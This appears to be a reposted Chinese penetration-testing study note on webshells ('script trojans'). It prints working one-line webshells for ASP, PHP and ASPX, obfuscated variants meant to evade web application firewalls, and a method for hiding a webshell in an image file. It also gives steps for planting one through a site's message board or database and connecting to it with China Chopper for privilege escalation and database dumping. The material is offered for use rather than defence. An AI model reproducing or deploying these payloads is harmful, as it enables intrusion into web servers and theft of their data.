滲透測試學習 十四、 腳本木馬的制作與原理


大綱:webshell制作與原理

   webshell使用技巧

   webshell“黑吃黑”

webshell制作原理

  webshell種類

    一句話木馬(使用的最多)、小馬、大馬、打包馬、脫褲馬、、、

  一句話木馬

    介紹:短小精悍,並且功能強大、隱蔽性非常好,在入侵種始終扮演着非常重要的角色

    e.g:<%execute request("value")%>

    解釋:

    execute:是一個執行函數,用來執行該命令

    request:是接收提交方式,可接受post型、get型、cookie型的傳參

    value:是參數,也是我們用菜刀連接時的密碼

    http://www.xx.com/x.asp?value=  以這種方式接收命令

    用菜刀連接時如下:

    

  常見寫法:

    asp一句話:

    <%eval request("pv")%>

    PHP一句話:

    <?php eval($_POST[a])?>

    aspx一句話:

    <%@ Page Language="Jscript"%><%eval(Request.Item["mima"],"unsafe");%>

     jsp一句話:(也是一種小馬)

    

  一句話木馬的變形(為了繞過waf)

    <?php $_REQUEST['a']($_REQUEST['b']);?>  這種方式已經淘汰了用不了了

    這個語句中沒有執行函數,只有兩個接收函數,使用的時候對參數a傳遞執行函數  /x.php?a=eval   然后再用菜刀連接

    

    <%Eval((Request(char(112))))%>

     用ascii碼轉碼,不再使用單引號、雙引號,防止閉合

 

    <%eval(eval(char(114)+char(101)+char(113)+char(117)+char(101)+char(115)+char(116)("xindong")%>

    用ascii碼轉碼,不再使用單引號、雙引號,防止閉合(asp用+號連接,php用.號連接)

 

    <%a=request("gold")%><%eval a%>

  一句話圖片馬制作(隱寫,建議使用搭建網站的素材圖片)

    c32或winhex做一句話

      用該軟件打開圖片,講一句話代碼放在最后面保存

    cmd下做一句話

      copy /d 1.jpg+1.asp 2.jpg  不建議

    也可以在圖片屬性中的詳細信息中添加一句話(版權中)

  常見的一句話客戶端

    一句話客戶端增強版

    中國菜刀  右后門  菜刀上傳大馬1,再刪除菜刀碼,大馬1上傳大馬2,刪除大馬1,要脫三次

    中國砍刀

    lanker一句話客戶端

    zv新型PHP一句話客戶端GUI版

  小馬

    體積小,易隱蔽,最重要的是與圖片結合在一起上傳后可以利用nginx或者iis6的解析漏洞來運行,不過功能少,一般只用來上傳大馬

  大馬

    體積大,50K大小左右,功能多,一般包括提權命令,磁盤管理,數據庫連接接口,執行命令甚至有些具備自帶的提權功能和壓縮,解壓縮網站程序功能,隱蔽性不好,而且大多數代碼不加密或被查殺。

一句話的使用

    首先,找到數據庫是asp格式的網站,然后,以留言板或者發表文章的方式,把一句話添加到數據庫,或者網頁。我們的目的是把一句話添加到數據庫,無論任何方式。然后菜刀連接。

  小馬使用

    主要用來上傳大馬

  大馬使用

    提權、打包、脫褲、增刪文件、、、

  使用技巧

    內容編碼、配合解析漏洞、配合文件包含、利用文件名溢出

      文件包含代碼,放在b.asp

    <!--#include file="conn.asp"-->

      conn.asp 就是要包含的文件

  使用的時候直接訪問b.asp,就會加載conn.asp文件

webshell“黑吃黑”

  找shell后門

    查找后門、查找webshell后門、找到后門地址、返搞webshell箱子 

 

2019-05-10  14:23:44


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM